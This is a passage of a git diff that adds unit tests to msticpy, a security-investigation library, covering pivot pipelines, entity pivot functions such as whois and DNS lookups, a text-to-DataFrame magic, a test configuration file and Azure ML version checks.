diff --git a/tests/datamodel/test_pivot_pipeline.py b/tests/datamodel/test_pivot_pipeline.py
new file mode 100644
index 000000000..704cbbbf0
--- /dev/null
+++ b/tests/datamodel/test_pivot_pipeline.py
@@ -0,0 +1,217 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Pivot pipeline tests."""
+import warnings
+
+import pytest
+import pytest_check as check
+import yaml
+
+from msticpy.datamodel.pivot import Pivot
+from msticpy.datamodel.pivot_pipeline import Pipeline
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="session")
+def _create_pivot():
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot()
+
+
+_EXPECTED_OUTPUT = """# Pipeline 1 description
+(
+    input_df
+    # Standard pivot function
+    .mp_pivot.run(IpAddress.util.whois, column='IpAddress', join='inner')
+    # Pivot display
+    .mp_pivot.display(title='The title', query='Computer.str.startswith('MSTICAlerts')', cols=['Computer', 'Account'], head=10)
+    # Pivot tee
+    .mp_pivot.tee(var_name='var_df', clobber=True)
+    # Pivot tee_exec with mp_timeline.plot
+    .mp_pivot.tee_exec('mp_timeline.plot', source_columns=['Computer', 'Account'])
+    # Standard accessor with mp_timeline.plot
+    .mp_timeline.plot('one', 2, source_columns=['Computer', 'Account'])
+)"""
+
+
+def test_pipeline_objects(_create_pivot):
+    """Test parse pipeline."""
+    pipelines = list(Pipeline.from_yaml(_TEST_PIPELINES))
+    check.equal(len(pipelines), 2)
+
+    check.equal(pipelines[0].name, "pipeline1")
+    check.equal(pipelines[0].description, "Pipeline 1 description")
+
+    check.equal(len(pipelines[0].steps), 5)
+    for step in pipelines[0].steps:
+        step_type = step.step_type
+        check.is_not_none(step.name)
+        check.is_not_none(step.comment)
+        check.is_not_none(step.params)
+        if step_type in ("pivot", "pivot_tee_exec", "pd_accessor"):
+            check.is_not_none(step.function)
+        if step_type == "pivot":
+            check.is_not_none(step.entity)
+
+    pl_repr = repr(pipelines[0])
+    check.is_in("Pipeline(name='pipeline1'", pl_repr)
+    check.is_in("steps=[PipelineStep(name='get_logons", pl_repr)
+
+    pl_txt = pipelines[0].print_pipeline(df_name="input_df")
+    check.equal(pl_txt, _EXPECTED_OUTPUT)
+    pl_txt = pipelines[0].print_pipeline(df_name="input_df", comments=False)
+    exp_no_comments = "\n".join(
+        nc_line
+        for nc_line in _EXPECTED_OUTPUT.split("\n")
+        if not nc_line.strip().startswith("#")
+    )
+    check.equal(pl_txt, exp_no_comments)
+
+    pl_single_dict = yaml.safe_load(_TEST_SINGLE_PIPELINE)
+    pl_single = Pipeline.parse_pipeline(pl_single_dict)
+    check.equal(pl_single.name, "pipeline1")
+    check.equal(pl_single.description, "Pipeline 1 description")
+
+    check.equal(len(pl_single.steps), 5)
+
+    # Test to_yaml
+    out_yaml = pl_single.to_yaml()
+    # The yaml won't be the same since None values will be null
+    out_dict = yaml.safe_load(out_yaml)
+    # but it should convert into an identical object
+    new_pipeline = Pipeline.parse_pipeline(out_dict)
+    check.equal(pl_single.name, new_pipeline.name)
+    check.equal(pl_single.description, new_pipeline.description)
+    for idx, step in enumerate(pl_single.steps):
+        check.equal(step, new_pipeline.steps[idx])
+
+
+_TEST_PIPELINES = """
+pipelines:
+  pipeline1:
+    description: Pipeline 1 description
+    steps:
+      - name: get_logons
+        step_type: pivot
+        function: util.whois
+        entity: IpAddress
+        comment: Standard pivot function
+        params:
+          column: IpAddress
+          join: inner
+      - name: disp_logons
+        step_type: pivot_display
+        comment: Pivot display
+        params:
+          title: "The title"
+          cols:
+              - Computer
+              - Account
+          query: Computer.str.startswith('MSTICAlerts')
+          head: 10
+      - name: tee_logons
+        step_type: pivot_tee
+        comment: Pivot tee
+        params:
+          var_name: var_df
+          clobber: True
+      - name: tee_logons_disp
+        step_type: pivot_tee_exec
+        comment: Pivot tee_exec with mp_timeline.plot
+        function: mp_timeline.plot
+        params:
+          source_columns:
+              - Computer
+              - Account
+      - name: logons_timeline
+        step_type: pd_accessor
+        comment: Standard accessor with mp_timeline.plot
+        function: mp_timeline.plot
+        pos_params:
+          - one
+          - 2
+        params:
+          source_columns:
+              - Computer
+              - Account
+  pipeline2:
+    description: Pipeline 2 description
+    steps:
+      - name: get_logons
+        step_type: pivot
+        function: util.whois
+        entity: IpAddress
+        comment: Standard pivot function
+        params:
+          column: IpAddress
+          join: inner
+      - name: disp_logons
+        step_type: pivot_display
+        comment: Pivot display
+        params:
+          title: "The title"
+          cols:
+              - Computer
+              - Account
+          query: Computer.str.startswith('MSTICAlerts')
+          head: 10
+      - name: tee_logons
+        step_type: pivot_tee
+        comment: Pivot tee
+        params:
+          var_name: var_df
+          clobber: True
+"""
+
+_TEST_SINGLE_PIPELINE = """
+pipeline1:
+    description: Pipeline 1 description
+    steps:
+      - name: get_logons
+        step_type: pivot
+        function: util.whois
+        entity: IpAddress
+        comment: Standard pivot function
+        params:
+          column: IpAddress
+          join: inner
+      - name: disp_logons
+        step_type: pivot_display
+        comment: Pivot display
+        params:
+          title: "The title"
+          cols:
+              - Computer
+              - Account
+          query: Computer.str.startswith('MSTICAlerts')
+          head: 10
+      - name: tee_logons
+        step_type: pivot_tee
+        comment: Pivot tee
+        params:
+          var_name: var_df
+          clobber: True
+      - name: tee_logons_disp
+        step_type: pivot_tee_exec
+        comment: Pivot tee_exec with mp_timeline.plot
+        function: mp_timeline.plot
+        params:
+          source_columns:
+              - Computer
+              - Account
+      - name: logons_timeline
+        step_type: pd_accessor
+        comment: Standard accessor with mp_timeline.plot
+        function: mp_timeline.plot
+        params:
+          source_columns:
+              - Computer
+              - Account
+"""
diff --git a/tests/datamodel/test_pivot_register.py b/tests/datamodel/test_pivot_register.py
new file mode 100644
index 000000000..8d20d14e3
--- /dev/null
+++ b/tests/datamodel/test_pivot_register.py
@@ -0,0 +1,296 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test Pivot registered functions."""
+import warnings
+from collections import namedtuple
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data.query_container import QueryContainer
+from msticpy.datamodel import entities
+from msticpy.datamodel.pivot import Pivot
+from msticpy.sectools import GeoLiteLookup, TILookup
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="session")
+def data_providers():
+    """Return dict of providers."""
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return {
+            "ti_lookup": TILookup(),
+            "geolite": GeoLiteLookup(),
+            #  "ip_stack": IPStackLookup(),
+        }
+
+
+def _reset_entities():
+    """Clear any query containers in entities."""
+    for entity_name in ("Host", "IpAddress", "Account", "Url"):
+        entity = getattr(entities, entity_name)
+        for attr in dir(entity):
+            if isinstance(getattr(entity, attr), QueryContainer):
+                delattr(entity, attr)
+
+
+@pytest.fixture(scope="session")
+def _create_pivot(data_providers):
+    _reset_entities()
+    providers = data_providers.values()
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot(providers=providers)
+
+
+EntityQuery = namedtuple(
+    "EntityQuery",
+    "entity, args, attrib, provider, pivot_func, func_param, src_col, exp_col, exp_val",
+)
+
+_ENTITY_QUERIES = [
+    pytest.param(
+        EntityQuery(
+            entity="IpAddress",
+            args=dict(Address="104.211.30.1"),
+            attrib="Address",
+            provider="util",
+            pivot_func="whois",
+            func_param="ip_address",
+            src_col="ip",
+            exp_col="asn_description",
+            exp_val="MICROSOFT-CORP-MSN-AS-BLOCK",
+        ),
+        id="IpAddress-who_is",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="IpAddress",
+            args=dict(Address="104.211.30.1"),
+            attrib="Address",
+            provider="util",
+            pivot_func="ip_type",
+            func_param="ip_str",
+            src_col="ip",
+            exp_col="result",
+            exp_val="Public",
+        ),
+        id="IpAddress-ip_type",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Process",
+            args=dict(
+                CommandLine="VGhpcyBpcyBhIHRlc3Qgb2YgYmFzZTY0IGVuY29kZWQgc3RyaW5n"
+            ),
+            attrib="CommandLine",
+            provider="util",
+            pivot_func="b64decode",
+            func_param="value",
+            src_col="cmdline",
+            exp_col="decoded_string",
+            exp_val="This is a test of base64 encoded string",
+        ),
+        id="Process-b64decode",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="Url",
+            provider="util",
+            pivot_func="extract_iocs",
+            func_param="value",
+            src_col="url",
+            exp_col="Observable",
+            exp_val="www.contoso.com",
+        ),
+        id="Url-extract_iocs",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="host",
+            provider="util",
+            pivot_func="dns_validate_tld",
+            func_param="value",
+            src_col="host",
+            exp_col="result",
+            exp_val="True",
+        ),
+        id="Url-dns_validate_tld",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="host",
+            provider="util",
+            pivot_func="dns_is_resolvable",
+            func_param="value",
+            src_col="host",
+            exp_col="result",
+            exp_val="True",
+        ),
+        id="Url-dns_is_resolvable",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="host",
+            provider="util",
+            pivot_func="dns_in_abuse_list",
+            func_param="value",
+            src_col="host",
+            exp_col="result",
+            exp_val="False",
+        ),
+        id="Url-dns_in_abuse_list",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="host",
+            provider="util",
+            pivot_func="dns_components",
+            func_param="value",
+            src_col="host",
+            exp_col="subdomain",
+            exp_val="www",
+        ),
+        id="Url-dns_components",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="host",
+            provider="util",
+            pivot_func="url_components",
+            func_param="value",
+            src_col="host",
+            exp_col="host",
+            exp_val="www.contoso.com",
+        ),
+        id="Url-url_components",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="Url",
+            args=dict(Url="https://www.contoso.com/path?p1=test"),
+            attrib="Url",
+            provider="util",
+            pivot_func="dns_resolve",
+            func_param="value",
+            src_col="host",
+            exp_col="qname",
+            exp_val="www.contoso.com",
+        ),
+        id="Url-dns_resolve",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="IpAddress",
+            args=dict(Address="104.211.30.1"),
+            attrib="Address",
+            provider="util",
+            pivot_func="ip_rev_resolve",
+            func_param="value",
+            src_col="host",
+            exp_col="qname",
+            exp_val="104.211.30.1",
+        ),
+        id="IpAddress-ip_rev_resolve",
+    ),
+    pytest.param(
+        EntityQuery(
+            entity="IpAddress",
+            args=dict(Address="104.211.30.1"),
+            attrib="Address",
+            provider="util",
+            pivot_func="geoloc",
+            func_param="value",
+            src_col="ip",
+            exp_col="CountryName",
+            exp_val="United States",
+        ),
+        id="IpAddress-geoip_maxmind",
+    ),
+    # This test sometimes files because of non-responsiveness
+    # from ipstack service
+    # pytest.param(
+    #     EntityQuery(
+    #         entity="IpAddress",
+    #         args=dict(Address="104.211.30.1"),
+    #         attrib="Address",
+    #         provider="util",
+    #         pivot_func="geoloc_ips",
+    #         func_param="value",
+    #         src_col="ip",
+    #         exp_col="CountryName",
+    #         exp_val="United States",
+    #     ),
+    #     id="IpAddress-geoip_ipstack",
+    # ),
+]
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_QUERIES)
+def test_entity_attr_funcs_entity(_create_pivot, test_case):
+    """Test calling function with entity attributes."""
+    # Test entity
+    ent_cls = getattr(entities, test_case.entity)
+    entity = ent_cls(**(test_case.args))
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    # Test entity input
+    result_df = func(entity)
+    check.is_in(test_case.exp_val, result_df.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_QUERIES)
+def test_entity_attr_funcs_value(_create_pivot, test_case):
+    """Test calling function with value."""
+    ent_cls = getattr(entities, test_case.entity)
+    entity = ent_cls(**(test_case.args))
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    # Test value input
+    val = getattr(entity, test_case.attrib)
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+    check.is_in(test_case.exp_val, result_df.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_QUERIES)
+def test_entity_attr_funcs_itbl(_create_pivot, test_case):
+    """Test calling function with iterable input."""
+    ent_cls = getattr(entities, test_case.entity)
+    entity = ent_cls(**(test_case.args))
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    # Test iterable input
+    val = [getattr(entity, test_case.attrib)]
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+    check.is_in(test_case.exp_val, result_df.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("test_case", _ENTITY_QUERIES)
+def test_entity_attr_funcs_df(_create_pivot, test_case):
+    """Test calling function with DF input attributes."""
+    ent_cls = getattr(entities, test_case.entity)
+    entity = ent_cls(**(test_case.args))
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    # Test DF input
+    val = getattr(entity, test_case.attrib)
+    in_df = pd.DataFrame([val], columns=[test_case.src_col])
+    result_df = func(data=in_df, src_column=test_case.src_col)
+    check.is_in(test_case.exp_val, result_df.iloc[0][test_case.exp_col])
diff --git a/tests/datamodel/test_txt_df_magic.py b/tests/datamodel/test_txt_df_magic.py
new file mode 100644
index 000000000..baf52606e
--- /dev/null
+++ b/tests/datamodel/test_txt_df_magic.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test Text to DF magic."""
+import pandas as pd
+import pytest_check as check
+
+from msticpy.datamodel.pivot_magic_core import run_txt2df
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+_INPUT_TEST = """
+file, lines1, lines2, lines3, percent
+msticpy___init__.py, 24, 12, 0, 50%
+msticpy__version.py, 1, 0, 0, 100%
+msticpy_analysis___init__.py, 3, 0, 0, 100%
+msticpy_analysis_anomalous_sequence___init__.py, 3, 0, 0, 100%
+msticpy_analysis_anomalous_sequence_anomalous.py, 34, 26, 0, 24%
+msticpy_analysis_anomalous_sequence_model.py, 222, 196, 0, 12%
+msticpy_analysis_anomalous_sequence_sessionize.py, 59, 52, 0, 12%
+msticpy_analysis_anomalous_sequence_utils___init__.py, 3, 0, 0, 100%
+msticpy_analysis_anomalous_sequence_utils_cmds_only.py, 76, 63, 0, 17%
+msticpy_analysis_anomalous_sequence_utils_cmds_params_only.py, 105, 91, 0, 13%
+msticpy_analysis_anomalous_sequence_utils_cmds_params_values.py, 126, 111, 0, 12%
+msticpy_analysis_anomalous_sequence_utils_data_structures.py, 27, 16, 0, 41%
+msticpy_analysis_anomalous_sequence_utils_laplace_smooth.py, 34, 28, 0, 18%
+msticpy_analysis_anomalous_sequence_utils_probabilities.py, 42, 35, 0, 17%
+"""
+
+# Magic args
+# "--sep",
+# "--name",
+# "--headers",
+# "--keepna",
+
+
+def test_txt2df():
+    """Test txt2df magic function."""
+    res_df = run_txt2df(line="", cell=_INPUT_TEST, local_ns=None)
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (15, 5))
+
+    # headers
+    res_df = run_txt2df(line="--headers", cell=_INPUT_TEST, local_ns=None)
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 5))
+    for col in _INPUT_TEST.split("\n")[1].split(","):
+        check.is_in(col.strip(), list(res_df.columns))
+
+    # separator
+    res_df = run_txt2df(
+        line="--headers --sep=\t", cell=_INPUT_TEST.replace(",", "\t"), local_ns=None
+    )
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 5))
+
+    # some malformed lines
+    cell_input = []
+    for idx, line in enumerate(_INPUT_TEST.split("\n")):
+        if line and idx % 5 != 3:
+            cell_input.append(line + ",")
+        else:
+            cell_input.append(line)
+    res_df = run_txt2df(line="--headers", cell="\n".join(cell_input), local_ns=None)
+    # expect output with dropped columns
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 5))
+
+    res_df = run_txt2df(
+        line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
+    )
+    # expect output with no dropped columns
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 6))
+
+    # add extra delimiters for 2 empty columns
+    cell_input = [line + ", ," for line in _INPUT_TEST.split("\n") if line]
+    res_df = run_txt2df(
+        line="--headers --keepna", cell="\n".join(cell_input), local_ns=None
+    )
+    # expect output with cols following header row
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 7))
+    for col in ("Unnamed: 5", "Unnamed: 6"):
+        check.is_in(col.strip(), list(res_df.columns))
+
+    # keepna should force blank columns to remain
+    res_df = run_txt2df(line="--keepna", cell="\n".join(cell_input), local_ns=None)
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (15, 7))
+
+    # name
+    namespace = {}
+    res_df = run_txt2df(
+        line="--headers --name=my_df", cell=_INPUT_TEST, local_ns=namespace
+    )
+    check.is_instance(res_df, pd.DataFrame)
+    check.equal(res_df.shape, (14, 5))
+    check.is_in("my_df", namespace)
+    check.is_instance(namespace["my_df"], pd.DataFrame)
+    check.equal(namespace["my_df"].shape, (14, 5))
diff --git a/tests/msticpyconfig-test.yaml b/tests/msticpyconfig-test.yaml
new file mode 100644
index 000000000..3e02746d4
--- /dev/null
+++ b/tests/msticpyconfig-test.yaml
@@ -0,0 +1,96 @@
+AzureSentinel:
+  Workspaces:
+    Default:
+      WorkspaceId: "52b1ab41-869e-4138-9e40-2a4457f09bf3"
+      TenantId: "72f988bf-86f1-41af-91ab-2d7cd011db49"
+      SubscriptionId: "cd928da3-dcde-42a3-aad7-d2a1268c2f48"
+      ResourceGroup: ABC
+      WorkspaceName: Workspace1
+    MyTestWS:
+      WorkspaceId: "a927809c-8142-43e1-96b3-4ad87cfe95a3"
+      TenantId: "69d28fd7-42a5-48bc-a619-af56397b9f28"
+QueryDefinitions:
+  Default:
+    - "queries"
+  Custom:
+    - "testdata"
+Azure:
+  cloud: "global"
+  auth_methods: ["cli", "msi", "interactive"]
+TIProviders:
+  OTX:
+    Args:
+      AuthKey:
+        EnvironmentVar: "OTX_AUTH"
+    Primary: True
+    Provider: "OTX"
+  VirusTotal:
+    Args:
+      AuthKey:
+        EnvironmentVar: "VIRUSTOTAL_AUTH"
+    Primary: True
+    Provider: "VirusTotal"
+  XForce:
+    Args:
+      ApiID:
+        EnvironmentVar: "XFORCE_ID"
+      AuthKey:
+        EnvironmentVar: "XFORCE_AUTH"
+    Primary: False
+    Provider: "XForce"
+  GreyNoise:
+    Args:
+      AuthKey: ""
+    Primary: True
+    Provider: "Greynoise"
+  OpenPageRank:
+    Args:
+      AuthKey:
+        EnvironmentVar: "OPR_AUTH"
+    Primary: True
+    Provider: "OPR"
+  TorExitNodes:
+    Primary: True
+    Provider: Tor
+  IntSights:
+    Args:
+      ApiID:
+        EnvironmentVar: "INTSIGHTS_ID"
+      AuthKey:
+        EnvironmentVar: "INTSIGHTS_AUTH"
+    Primary: True
+    Provider: IntSights
+OtherProviders:
+  GeoIPLite:
+    Args:
+      AuthKey:
+        EnvironmentVar: "MAXMIND_AUTH"
+      DBFolder: "~/.msticpy"
+    Provider: "GeoLiteLookup"
+  IPStack:
+    Args:
+      AuthKey:
+        EnvironmentVar: "IPSTACK_AUTH"
+    Provider: "IPStackLookup"
+DataProviders:
+  MicrosoftDefender:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
+  MicrosoftGraph:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 66b9818a-26cd-4584-8eb0-7f7a499242aa
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
+  Mordor:
+    save_folder: ~/.msticpy/mordor
+    use_cached: true
+  Cybereason:
+    Args:
+      TenantId: 8360dd21-0294-4240-9128-89611f415c53
+      ClientId: 1234
+      ClientSecret:
+        EnvironmentVar: "IPSTACK_AUTH"
diff --git a/tests/nbtools/__init__.py b/tests/nbtools/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/nbtools/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/nbtools/test_azure_ml_tools.py b/tests/nbtools/test_azure_ml_tools.py
new file mode 100644
index 000000000..55c8440e1
--- /dev/null
+++ b/tests/nbtools/test_azure_ml_tools.py
@@ -0,0 +1,222 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure ML module test."""
+import sys
+from collections import namedtuple
+from pathlib import Path
+from typing import Any, Dict
+
+import pytest
+import pytest_check as check
+
+from msticpy.nbtools import azure_ml_tools as aml
+
+from ..unit_test_lib import change_directory
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+_MIN_PY_VER = "3.6"
+_MIN_MP_VER = "1.0.0"
+_MIN_PY_VER_T = (3, 6, 0)
+_MIN_MP_VER_T = (1, 0, 0)
+
+# Mocked nb_check.py
+_NB_CHECK_TXT = """
+import os
+
+__version__ = "1.5.0"
+
+def some_func(foo):
+    print("hello")
+
+"""
+
+# Mocked nbuser_settings.py
+_NBUSER_SETTINGS = """
+TEST_FLAG = True
+"""
+
+_MP_CONFIG = "msticpyconfig-test.yaml"
+
+
+@pytest.fixture(scope="module")
+def aml_file_sys(tmpdir_factory):
+    """Create fake aml file system."""
+    mp_text = Path("tests").joinpath(_MP_CONFIG).read_text(encoding="utf-8")
+    root = tmpdir_factory.mktemp("aml-test")
+    users = root.mkdir("Users")
+    user_dir = users.mkdir("aml_user")
+    user_dir.mkdir("utils")
+    user_dir.mkdir("subdir")
+
+    user_dir.join("msticpyconfig.yaml").write_text(mp_text, encoding="utf-8")
+    user_dir.join("msticpyconfig.save").write_text(mp_text, encoding="utf-8")
+    nb_check = user_dir.join("utils").join("nb_check.py")
+    nb_check.write_text(_NB_CHECK_TXT, encoding="utf-8")
+    yield users, user_dir
+
+
+_CURR_VERSION = [v for v in aml.__version__.split(".") if v.isnumeric()]
+_MP_FUT_VER = ".".join(f"{int(v) + 1}" for v in _CURR_VERSION)
+_MP_FUT_VER_T = tuple(int(v) + 1 for v in _CURR_VERSION)
+
+_EXP_ENV = {
+    "KQLMAGIC_EXTRAS_REQUIRE": "jupyter-basic",
+    "KQLMAGIC_AZUREML_COMPUTE": "myhost",
+}
+_EXP_ENV_JPX = _EXP_ENV.copy()
+_EXP_ENV_JPX["KQLMAGIC_EXTRAS_REQUIRE"] = "jupyter-extended"
+
+
+class _PyOs:
+    """Emulation for os package."""
+
+    def __init__(self):
+        self.environ: Dict[str, Any] = {}
+
+
+class _ipython:
+    """Emulation for IPython shell."""
+
+    pgo_installed = False
+
+    def run_line_magic(self, *args, **kwargs):
+        """Return package list."""
+        del kwargs
+        if "apt list" in args:
+            if self.pgo_installed:
+                return ["libgirepository1.0-dev", "gir1.2-secret-1"]
+            return []
+
+
+CheckVers = namedtuple("CheckVers", "py_req, mp_req, extras, is_aml, excep, env")
+
+CHECK_VERS = [
+    CheckVers(_MIN_PY_VER, _MIN_MP_VER, None, True, None, _EXP_ENV),
+    CheckVers(_MIN_PY_VER, _MIN_MP_VER, ["azsentinel"], True, None, _EXP_ENV_JPX),
+    CheckVers("9.9", _MIN_MP_VER, None, True, RuntimeError, _EXP_ENV),
+    CheckVers(_MIN_PY_VER, _MP_FUT_VER, None, True, ImportError, _EXP_ENV),
+    # is_aml == False
+    CheckVers(_MIN_PY_VER, _MIN_MP_VER, None, False, None, _EXP_ENV),
+    CheckVers(_MIN_PY_VER, _MIN_MP_VER, ["azsentinel"], False, None, _EXP_ENV_JPX),
+    # Versions as tuples
+    CheckVers(_MIN_PY_VER_T, _MIN_MP_VER_T, None, True, None, _EXP_ENV),
+    CheckVers(_MIN_PY_VER_T, _MIN_MP_VER_T, ["azsentinel"], True, None, _EXP_ENV_JPX),
+    CheckVers((9, 9), _MIN_MP_VER_T, None, True, RuntimeError, _EXP_ENV),
+    CheckVers(_MIN_PY_VER_T, _MP_FUT_VER_T, None, True, ImportError, _EXP_ENV),
+]
+
+
+def _test_ids(test_cases):
+    for test_case in test_cases:
+        yield "-".join(
+            f"{key}:{str(val)[:10]}" for key, val in test_case._asdict().items()
+        )
+
+
+@pytest.mark.parametrize("check_vers", CHECK_VERS, ids=_test_ids(CHECK_VERS))
+def test_check_versions(monkeypatch, aml_file_sys, check_vers):
+    """Test check_versions."""
+    _, user_dir = aml_file_sys
+
+    # monkeypatch for various test cases
+    _os = _PyOs()
+    monkeypatch.setattr(aml, "os", _os)
+    monkeypatch.setattr(aml, "get_ipython", _ipython)
+    monkeypatch.setattr(aml, "_get_vm_fqdn", lambda: "myhost")
+
+    if check_vers.is_aml:
+        # Set an env var to emulate AML
+        _os.environ["APPSETTING_WEBSITE_SITE_NAME"] = "AMLComputeInstance"
+
+    if check_vers.excep:
+        with pytest.raises(check_vers.excep):
+            with change_directory(str(user_dir)):
+                aml.check_versions(
+                    min_py_ver=check_vers.py_req,
+                    min_mp_ver=check_vers.mp_req,
+                    extras=check_vers.extras,
+                )
+    else:
+        with change_directory(str(user_dir)):
+            aml.check_versions(
+                min_py_ver=check_vers.py_req,
+                min_mp_ver=check_vers.mp_req,
+                extras=check_vers.extras,
+            )
+
+        env = "KQLMAGIC_EXTRAS_REQUIRE"
+        check.is_in(env, _os.environ)
+        check.equal(check_vers.env[env], _os.environ.get(env))
+        if check_vers.is_aml:
+            env = "KQLMAGIC_AZUREML_COMPUTE"
+            check.is_in(env, _os.environ)
+            check.equal(check_vers.env[env], _os.environ.get(env))
+
+
+MpConfig = namedtuple("MpConfig", "sub_dir, mpconf_exists")
+_MP_CONFIG_TESTS = [
+    MpConfig(False, True),
+    MpConfig(False, False),
+    MpConfig(True, True),
+    MpConfig(True, False),
+]
+
+
+@pytest.mark.parametrize("test_case", _MP_CONFIG_TESTS, ids=_test_ids(_MP_CONFIG_TESTS))
+def test_check_versions_mpconfig(monkeypatch, aml_file_sys, test_case):
+    """Test check_versions."""
+    _, user_dir = aml_file_sys
+    mp_path = user_dir.join("msticpyconfig.yaml")
+    mp_backup = user_dir.join("msticpyconfig.save")
+
+    target_dir = user_dir.join("subdir") if test_case.sub_dir else user_dir
+
+    if not test_case.mpconf_exists:
+        mp_path.remove(ignore_errors=True)
+
+    # monkeypatch for various test cases
+    _os = _PyOs()
+    monkeypatch.setattr(aml, "os", _os)
+    monkeypatch.setattr(aml, "_get_vm_fqdn", lambda: "myhost")
+
+    # Set an env var to emulate AML
+    _os.environ["APPSETTING_WEBSITE_SITE_NAME"] = "AMLComputeInstance"
+
+    with change_directory(str(target_dir)):
+        aml.check_versions(min_py_ver=_MIN_PY_VER, min_mp_ver=_MIN_MP_VER)
+
+    if test_case.sub_dir and test_case.mpconf_exists:
+        env = "MSTICPYCONFIG"
+        check.is_in(env, _os.environ)
+        check.is_true(mp_path.samefile(_os.environ.get(env)))
+    mp_backup.copy(mp_path)
+
+
+def test_check_versions_nbuser_settings(monkeypatch, aml_file_sys):
+    """Test nb_check update."""
+    _, user_dir = aml_file_sys
+
+    # monkeypatch for various test cases
+    _os = _PyOs()
+    monkeypatch.setattr(aml, "os", _os)
+    monkeypatch.setattr(aml, "_get_vm_fqdn", lambda: "myhost")
+
+    # Set an env var to emulate AML
+    _os.environ["APPSETTING_WEBSITE_SITE_NAME"] = "AMLComputeInstance"
+
+    # Create an old version of nb_check
+    nb_user_settings = user_dir.join("nbuser_settings.py")
+    nb_user_settings.write_text(_NBUSER_SETTINGS, encoding="utf-8")
+
+    with change_directory(str(user_dir)):
+        aml.check_versions(min_py_ver=_MIN_PY_VER, min_mp_ver=_MIN_MP_VER)
+
+    check.is_in("nbuser_settings", sys.modules)
+    nbus_import = sys.modules["nbuser_settings"]
+    check.is_true(nbus_import.TEST_FLAG)
diff --git a/tests/nbtools/test_data_viewer.py b/tests/nbtools/test_data_viewer.py
new file mode 100644
index 000000000..6451c9c85
--- /dev/null
+++ b/tests/nbtools/test_data_viewer.py
@@ -0,0 +1,187 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from datetime import datetime
+from pathlib import Path
+
+from bokeh.models import DateFormatter
+import pandas as pd
+import pytest
+import pytest_check as check
+from traitlets import TraitError
+
+from msticpy.nbtools.data_viewer import (
+    DataViewer,
+    DataTableColumnChooser,
+    DataTableFilter,
